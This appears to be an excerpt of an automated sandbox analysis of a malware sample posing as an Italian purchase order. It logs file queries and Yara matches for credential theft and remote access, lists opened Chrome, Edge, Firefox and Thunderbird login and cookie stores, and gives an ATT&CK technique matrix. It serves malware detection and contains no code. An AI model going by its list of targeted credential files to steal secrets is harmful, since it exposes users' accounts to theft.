                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Users\user\AppData\Roaming\FNOqSQ.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.2c07308.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.52b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.52b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.2c07308.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4121165518.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PUK ITALIA PO 120610549.EXE.exe PID: 6104, type: MEMORYSTR
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.2c07308.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.52b0000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.52b0000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.FNOqSQ.exe.2c07308.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1690016809.00000000052B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1687399793.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    11
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    23
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job
                    2
                    Obfuscated Files or Information
                    Security Account Manager1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model21
                    Input Capture
                    13
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
